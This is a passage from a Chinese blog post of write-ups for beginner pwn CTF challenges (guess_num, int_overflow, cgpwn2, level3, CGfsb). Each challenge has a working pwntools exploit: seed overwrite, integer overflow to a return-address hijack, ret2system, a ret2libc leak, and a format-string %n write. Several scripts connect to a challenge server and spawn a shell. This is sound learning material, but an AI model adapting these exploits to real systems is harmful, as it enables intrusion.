<p>考点为栈溢出</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803015022245.png" alt="image-20210803015022245"></p>
<p>中间隔着0x20加seed四个字节</p>
<p>选择用“aaaa”覆盖掉seed，但是写脚本的时候要把aaaa转为十六进制即0x61616161</p>
<p>在Linux里根据IDA里随机数的计算法则写伪随机数脚本</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> a, i;</span><br><span class="line">	srand(<span class="number">0x61616161</span>);</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">10</span>;i++)&#123;</span><br><span class="line">		a=rand()%<span class="number">6</span>+<span class="number">1</span>;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>,a);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>运行出来得到</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803015410884.png" alt="image-20210803015410884"></p>
<p>直接完成一个简单的exp脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context(arch = &#x27;amd64&#x27;, os = &#x27;linux&#x27;)</span></span><br><span class="line">r = remote(<span class="string">&quot;111.200.241.244&quot;</span>, <span class="number">60098</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>+<span class="string">&quot;aaaa&quot;</span></span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">&quot;Your name:&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line">num=[<span class="string">&quot;5&quot;</span>,<span class="string">&quot;6&quot;</span>,<span class="string">&quot;4&quot;</span>,<span class="string">&quot;6&quot;</span>,<span class="string">&quot;6&quot;</span>,<span class="string">&quot;2&quot;</span>,<span class="string">&quot;3&quot;</span>,<span class="string">&quot;6&quot;</span>,<span class="string">&quot;2&quot;</span>,<span class="string">&quot;2&quot;</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line"></span><br><span class="line">	r.sendlineafter(<span class="string">&quot;Please input your guess number:&quot;</span>,num[i])</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>法二：利用v7覆盖seed[0],使seed[0]已知，然后算法里循环，就拿到flag了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="comment">#p = remote(&#x27;111.198.29.45&#x27;,41080)</span></span><br><span class="line">p = process(<span class="string">&#x27;./guess_num&#x27;</span>)</span><br><span class="line">libc = cdll.LoadLibrary(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line">payload = <span class="string">&quot;a&quot;</span> * <span class="number">0x20</span> + p64(<span class="number">0</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;name:&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">libc.srand(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    num = <span class="built_in">str</span>(libc.rand()%<span class="number">6</span>+<span class="number">1</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;number:&#x27;</span>)</span><br><span class="line">    p.sendline(num)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


<h3 id="int-overflow"><a href="#int-overflow" class="headerlink" title="int_overflow"></a>int_overflow</h3><p>知识补充：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/jopny/p/13527880.html">整数溢出</a></p>
<p>照例查运行</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803204915843.png" alt="image-20210803204915843"></p>
<p>吓得我以为要出flag</p>
<p>拖IDA跟进login</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803205002331.png" alt="image-20210803205002331"></p>
<p>跟进strcpy()函数，发现存在栈溢出</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803205112864.png" alt="image-20210803205112864"></p>
<p>可以知道dest距离ret的长度为0x14+4</p>
<p>然后又发现了cat flag</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803205315714.png" alt="image-20210803205315714"></p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803205340200.png" alt="image-20210803205340200"></p>
<p>记录地址0x0804868b</p>
<p>利用整数溢出（在linux环境下，编译器会提醒溢出，但仍然会输出的值）返回ida查看变量v3的值为[3,8)，而输入的密码变量s的长度为0x199，即十进制里的409，又因为v3的类型为unsigned _int8，即[8位无符号整数](<a target="_blank" rel="noopener" href="https://zhidao.baidu.com/question/1818954413951622788.html#:~:text=8%E4%BD%8D%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%89%80%E8%83%BD%E8%A1%A8%E7%A4%BA%E7%9A%84%E6%97%A0%E7%AC%A6%E5%8F%B7%E6%95%B4%E6%95%B0%E8%8C%83%E5%9B%B4%E4%B8%BA0~255%EF%BC%9B8%E4%BD%8D%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%89%80%E8%83%BD%E8%A1%A8%E7%A4%BA%E7%9A%84%E5%B8%A6%E7%AC%A6%E5%8F%B7%E6%95%B4%E6%95%B0%E8%8C%83%E5%9B%B4%E4%B8%BA-128~127%E3%80%82">https://zhidao.baidu.com/question/1818954413951622788.html#:~:text=8位二进制所能表示的无符号整数范围为0~255；8位二进制所能表示的带符号整数范围为-128~127。</a> 无符号数 (Unsigned number)是相对于有符号数而言的，指的是整个机器字长的全部二进制位均表示数值位，相当于数的绝对值。 用二进制数的最高位表示符号，最高位是0，表示正数，最高位是1，表示负数。 这种说法本身没错，可是如果没有下文，那么它就是错的。 至少它不能解释，为什么字符类型的-1用二进制表示是“1111,1111” (16进制为FF)；而不是我们更能理解的“1000 0001”。 有符号整数可表示正整数、0和负整数值。 其二进制编码方式包含 符号位 和 真值域。)，最大值为255。所以v3的最大值为255且为无符号整数,所以当s长度为256时v3=0，所以s的输入长度为[259,264)即可符合v3的值</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context(arch = &#x27;amd64&#x27;, os = &#x27;linux&#x27;)</span></span><br><span class="line">r = remote(<span class="string">&quot;111.200.241.244&quot;</span>, <span class="number">62179</span>)</span><br><span class="line"></span><br><span class="line">sys=<span class="number">0x0804868b</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x14</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">4</span>+p32(sys)</span><br><span class="line">payload = payload.ljust(<span class="number">259</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">&quot;Your choice:&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">r.sendlineafter(<span class="string">&quot;Please input your username:&quot;</span>,<span class="string">&quot;111&quot;</span>)</span><br><span class="line">r.sendlineafter(<span class="string">&quot;Please input your passwd:&quot;</span>,payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803210809155.png" alt="image-20210803210809155"></p>
<h3 id="cgpwn2"><a href="#cgpwn2" class="headerlink" title="cgpwn2"></a>cgpwn2</h3><p>知识补充：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_30321709/article/details/95579948?utm_medium=distribute.pc_relevant.none-task-blog-2~default~searchFromBaidu~default-1.pc_relevant_baidujshouduan&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~searchFromBaidu~default-1.pc_relevant_baidujshouduan">0xdeadbeef</a></p>
<p>常规操作<img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212301602.png" alt="image-20210803212301602"></p>
<p>IDA跟进</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212329433.png" alt="image-20210803212329433"></p>
<p>发现gets，栈溢出。很快找到溢出点s</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212806191.png" alt="image-20210803212806191"></p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212825087.png" alt="image-20210803212825087"></p>
<p>可知s距离ret长度为0x26+4，随后又记录下system的地址为08048420</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212923418.png" alt="image-20210803212923418"></p>
<p>不过system没有/bin/sh可以执行，不知道在哪里搞出来，查看wp</p>
<p><strong>得知name在.bss里，可以把它写成/bin/sh</strong></p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212947420.png" alt="image-20210803212947420"></p>
<p>exp就有了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context(arch = &#x27;amd64&#x27;, os = &#x27;linux&#x27;)</span></span><br><span class="line">r = remote(<span class="string">&quot;111.200.241.244&quot;</span>, <span class="number">51159</span>)</span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;name&#x27;</span>,<span class="string">&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">sys=<span class="number">0x08048420</span></span><br><span class="line">sh=<span class="number">0x0804A080</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x26</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">4</span>+p32(sys)+p32(<span class="number">0xdeadbeef</span>)+p32(sh)</span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">&quot;hello,you can leave some message here:&quot;</span>,payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803213109114.png" alt="image-20210803213109114"></p>
<h3 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h3><p>照例</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803215305368.png" alt="image-20210803215305368"></p>
<p>看IDA里有read和write，是ret2libc的题型，直接看wp</p>
<p>思路是通过read函数的栈溢出返回到write函数，利用write函数写出__libc_start_main在got表中的位置，利用LibcSearcher工具查找到相应的libc库，从而得到基地址，不过题目给了也不用工具</p>
<p>拿exp——</p>
<p>使用工具版本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line">elf=ELF(<span class="string">&#x27;./level3&#x27;</span>)</span><br><span class="line"></span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">libc_start_main_got = elf.got[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">vuln = <span class="number">0x0804844b</span></span><br><span class="line"></span><br><span class="line">r.recvline()</span><br><span class="line">payload1 = <span class="string">&#x27;a&#x27;</span>*<span class="number">140</span> +p32(write_plt) + p32(vuln) + p32(<span class="number">1</span>) + p32(libc_start_main_got) + p32(<span class="number">4</span>)</span><br><span class="line">r.sendline(payload1)</span><br><span class="line">libc_start_main_addr = u32(r.recv()[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;__libc_start_main&#x27;</span>, libc_start_main_addr)</span><br><span class="line">libcbase = libc_start_main_addr - libc.dump(<span class="string">&#x27;__libc_start_main&#x27;</span>)</span><br><span class="line">system = libcbase + libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh = libcbase + libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">payload2 = flat([<span class="string">&#x27;a&#x27;</span>*<span class="number">140</span>, system, <span class="number">0xdeadbeef</span>, binsh])</span><br><span class="line">r.sendline(payload2)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>使用题目库版本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line"><span class="comment">#r=process(&#x27;./level3&#x27;)</span></span><br><span class="line">r = remote(<span class="string">&quot;&quot;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./level3&#x27;</span>)</span><br><span class="line"></span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">main = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line"></span><br><span class="line">r.recvline()</span><br><span class="line">payload1 = <span class="string">&#x27;a&#x27;</span>*<span class="number">140</span> +p32(write_plt) + p32(main) + p32(<span class="number">1</span>) + p32(write_got) + p32(<span class="number">4</span>)</span><br><span class="line">r.sendline(payload1)</span><br><span class="line">write_got_addr = u32(r.recv()[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc_32.so.6&#x27;</span>)</span><br><span class="line">libcbase = write_got_addr - libc.sym[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line"></span><br><span class="line">system = libcbase + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">binsh = libc.search(<span class="string">&quot;/bin/sh&quot;</span>).<span class="built_in">next</span>() + libcbase</span><br><span class="line">payload2 = flat([<span class="string">&#x27;a&#x27;</span>*<span class="number">140</span>, system, <span class="number">0xdeadbeef</span>, binsh])</span><br><span class="line"></span><br><span class="line"><span class="comment">#r.recvuntil(&#x27;:\n&#x27;)</span></span><br><span class="line">r.sendline(payload2)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803233148272.png" alt="image-20210803233148272"></p>
<h3 id="CGfsb"><a href="#CGfsb" class="headerlink" title="CGfsb"></a>CGfsb</h3><p>照例</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803233438018.png" alt="image-20210803233438018"></p>
<p>IDA</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803235552887.png" alt="image-20210803235552887"></p>
<p>if语句可以分析出来pwnme=8就可以cat flag，又发现了printf，存在格式化字符串漏洞，通过地址任意写，即把s的内容写成pwnme的地址即8，所以先记录下pwnme的地址</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210804001143804.png" alt="image-20210804001143804"></p>
<p>然后找偏移量</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210804000926106.png" alt="image-20210804000926106"></p>
<p>数出来是10，即任意写可为%10$n，又因为p32将地址转为4个字节，所以还差4个字节，用“aaaa”代替就行</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context(arch = &#x27;amd64&#x27;, os = &#x27;linux&#x27;)</span></span><br><span class="line"><span class="comment">#r = process(&quot;./CGfsb&quot;)</span></span><br><span class="line">r=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">58931</span>)</span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">&quot;please tell me your name:&quot;</span>,<span class="string">&quot;hh&quot;</span>)</span><br><span class="line"></span><br><span class="line">sys = <span class="number">0x0804A068</span></span><br><span class="line">payload = p32(sys)+<span class="string">&quot;aaaa%10$n&quot;</span></span><br><span class="line">r.sendlineafter(<span class="string">&quot;leave your message please:&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210804153644665.png" alt="image-20210804153644665"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Pwn%E5%88%B7%E9%A2%98/" rel="tag"># Pwn刷题</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BRe/" rel="prev" title="攻防世界新手Re">
                  <i class="fa fa-chevron-left"></i> 攻防世界新手Re
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E8%BF%9B%E9%98%B6Pwn/" rel="next" title="攻防世界进阶Pwn">
                  攻防世界进阶Pwn <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>







<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">YX</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
